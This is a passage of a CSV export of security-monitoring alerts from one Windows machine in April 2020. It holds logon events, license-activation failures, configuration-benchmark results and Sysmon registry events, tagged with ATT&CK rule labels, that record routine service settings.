C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:31.708",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:55:31.614",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:55:26.522",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:55:23.742",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:55:23.665",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:23.564",3,"The database engine attached a database",,"""SearchIndexer (4628,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00CD:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.048916 -0.048683 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.044182 -0.039828 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:124K # 0K, PF:144K # 0K, P:144K) +[4] 0.000120 +J(0) +[5] - +[6] - +[7] - +[8] 0.002436 -0.000803 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:204K # 0K, PF:640K # 0K, P:640K) +[9] 0.066380 -0.004388 (5) CM -0.061757 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 136K, P:256K) +[10] 0.000183 -0.000084 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 24K, PF:96K # 96K, P:96K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000033 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:55:23.331",3,"The database engine is starting a new instance",,"""SearchIndexer (4628,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:55:21.786",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 
10:55:19.804",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:15.274858600Z"",""eventRecordID"":""673"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:15.231\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:15.231"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:15.231 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.865",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.983548900Z"",""eventRecordID"":""667"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.838",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.983337800Z"",""eventRecordID"":""666"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:18.819",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.982535100Z"",""eventRecordID"":""665"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.802",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.980829000Z"",""eventRecordID"":""664"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.779",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.979243700Z"",""eventRecordID"":""663"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f520\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.762",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.978847300Z"",""eventRecordID"":""662"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.648",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.978058900Z"",""eventRecordID"":""661"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:55:18.618",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.977702900Z"",""eventRecordID"":""660"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.602",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.976587900Z"",""eventRecordID"":""659"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.591",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.976314000Z"",""eventRecordID"":""658"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.522",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.975430800Z"",""eventRecordID"":""657"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.399",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.975066600Z"",""eventRecordID"":""656"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 